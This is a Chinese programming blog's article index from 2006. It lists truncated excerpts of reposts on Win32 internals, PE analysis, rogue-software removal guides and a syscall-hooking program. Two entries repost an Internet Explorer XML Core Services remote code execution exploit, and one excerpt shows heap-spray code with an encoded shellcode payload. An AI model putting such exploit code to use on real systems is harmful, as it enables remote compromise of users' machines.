- 博客(16)
- 资源 (6)
- 收藏
- 关注
转载 Hooking KiFastSystemCall
program KiFastSystemCall; uses Windows, madCodeHook, SysUtils; var realKiFastSystemCall: procedure; dwIndexPVM: DWORD; function hookZwProtectVirtualMemory(hProcess: THandle; lpAddress: Pointer;
2006-11-27 00:40:00 2815
转载 探索Win32系统之窗口类(Window Classes in Win32)
翻译说明: 以前一直没有很在意窗口类的使用,我近期在用vc做一些界面时遇到窗口类定义的概念,这次翻MSDN的时候看到了一篇文章,讲到窗口类的一些基本概念,匆匆看完,翻译出来当学习笔记,可能有一些细节上的谬误,请包涵。放在网上,如果大家觉得值得参考,就看看。 vcbear翻译 vcbear@163.com 探索Win32系统之窗口类(Window Cl
2006-11-26 23:28:00 1756
转载 经典与现代的结合:在MFC中集成RAD .NET框架
发布日期: 6/29/2005 | 更新日期: 6/29/2005作者:孙辉MFC已经有十几年的历史了,然而直到今天,他仍然是Visual C++的关键组成部分。从1996年的Visual C++ 4.2至今将近8年的时间,MFC的主体特征没有出现明显的变化,依旧是“古老”的面孔,因此关于这个类库的种种评论自然是情理之中的事情了。从我个人的观点上看,MFC功能依旧健壮、强大,而且是业界
2006-11-26 23:25:00 1795
转载 深入剖析MY123前生今世以及手工清除方法
感谢nslog的投递,一篇很不错的文章,推荐阅读:引言:写在最前面MY123创造了很多流氓软件的第一,有望争夺流氓软件的“最流氓软件宝座”:1、驱动保护(System Bus Extend驱动,安全模式下也加载)2、随机文件名,DLL和SYS3、多线程保护,网络自动升级4、极强的自动恢复(即使在所有文件被删除的情况下,仍然可以通过内存恢复!)5、驱动文件独占方式,其它任何程序也无法读写及删除6、
2006-11-18 23:35:00 1528
转载 PE 结构分析技术在反病毒中的应用
PE的意思就是Portable Executable(可移植的执行体)。它是 Win32 环境自身所带的执行体文件格式,如:Exe文件,DLL 文件均为PE 格式。它的一些特性继承自 Unix 的Coff (common object file format)文件格式。"portable executable"(可移植的执行体)意味着此文
2006-11-17 15:08:00 1439
转载 显示EXEDLL或PDB文件中指定函数的Parameter和local variables信息
显示EXE,DLL或PDB文件中指定函数的Parameter和local variables信息//============================================================================// LFVars : A small tool used to display function symbol informaton
2006-11-14 09:54:00 1155
转载 MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit 2
var heapSprayToAddress = 0x05050505; var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
2006-11-13 17:02:00 979
转载 MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution ExploitAuthor: n/aInfo:http://blogs.securiteam.com/index.php/archives/721http://isc.sans.org/diary.php?storyid=1823http://xforce.iss.
2006-11-13 17:01:00 1118
转载 探讨两个比较难杀灭的灰鸽子变种
主题: 探讨两个比较难杀灭的灰鸽子变种 非常感谢你开了这样一个博客来帮助大家解决问题。正是你提供的procexp帮我解决掉了一个灰鸽子变种。 我为了这个木马忙了两天多,在网上没有找到什么有价值的解决方法,是你的博客帮我最终解决了问题。我想把具体的情况跟你介绍一下。通过你的博客把相关经验介绍出去,方便更多的网友。因为我发现和我有相同遭遇的网友基本都无法解决问题。毕竟你的网页的流量会有
2006-11-13 10:06:00 2162
转载 Windows2000/XP/2003启动过程
先看一下NT系统的引导过程,NT系统从按下计算机开关启动计算机,到登入到桌面完成启动,一共经过了以下几个阶段: 1. 预引导(Pre-Boot)阶段 在这个阶段里,计算机首先运行Power On Self TestPOST),POST检测系统的总内存以及其他硬件设备的现状。如果计算机系统的BIOS(基础输入/输出系统)是即插即用的,那么计算机硬件设备将经过检验以及完成配置。计算机的基础
2006-11-13 09:51:00 1679
转载 关于查找流氓软件驱动保护的补充
作者:网络安全日志 日期:2006/10/15 ( 转载请保留此申明) 一、序言 我曾于06/10/01的时候发过一篇《釜底抽薪:用autoruns揪出流氓软件的驱动保护》的文章,经过一些网友讨论和反应,得到一些有益的反馈。今天在360的论坛上看到一个网友建议,想一想有必须做一个补充。二、Windows提供的文件签名验证工具 Windows其实也提供了
2006-11-13 09:46:00 1235
转载 主页被锁定为good.allxun.com的手工清除办法
作者:网络安全日志 日期:2006/11/12 (转载请保留此申明) 10号遇一网友在QQ上求助,机器主页被锁定为http://good.allxun.com,用360等软件扫描都没有发现可疑的。在网上搜了一下,很多人都提出各种办法和猜测,但都没有很明确的说法。有点怀疑是飘雪的变种。由于没有流氓软件样本,只好让对方把SRENG的扫描日志发过来,初步分析了一下,应该是飘
2006-11-13 09:44:00 1568
转载 my123.com的分析以及专杀工具
作者:网络安全日志 日期:2006/11/12 (转载请保留此申明) piaoxue这个驱动的另外一个变种,刚刚写了一个主页被锁定为good.allxun.com的,也是它的一异种。看来庞升东拿到这个东西之后,准备让他四处开花结果.....(paixue驱动是YAHOO的一个人写的,后来据说是转手卖给庞升东,然后就有了这么多(piaoxue,feixue,QQHelper,
2006-11-13 09:41:00 2572
转载 釜底抽薪:用autoruns揪出流氓软件的驱动保护
作者:网络安全日志 日期:2006/10/01 ( 转载请保留此申明) 一、为什么流氓软件总是删不掉? 经常有网友发贴子说文件删除不掉,或者流氓软件清除不了,或者删除了相关的文件,但是马上它又出现了。现在流氓软件为了保护自己,采取的手段是五花八门,无所不用其极:进程保护,交叉感染,自启动,自我恢复,文件隐藏,进程注入,驱动保护。在我的上一篇文章中《[惊天大发现]顽固文件
2006-11-13 09:24:00 1299
转载 飘雪(piaoxue/feixue)的详细分析以及手工清除办法[10/26更新]
作者:网络安全日志 日期:2006/10/20 ( 转载请保留此申明) 10/26更新说明:23号开始陆续有用户反应飘雪用专杀工具杀不掉,经过分析,飘雪的作者做了升级,特征是驱动文件还有一个同名的.dll文件。目前所有专杀无效,通过试验,手工办法还是可以清除的。特更新一、概述 近来中了piaoxue.com和feixue.com招的用户很多,一直在想办法收集样本,今天终于下载了
2006-11-13 09:21:00 1819
原创 新方法爆出!!一起来注册'@live.com'!
新方法爆出!!跟cnBeta一起来注册@live.com! 又一个Windows Live的@live.com
2006-11-13 09:19:00 2426 1
UDP协议可靠传输文件
2011-09-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人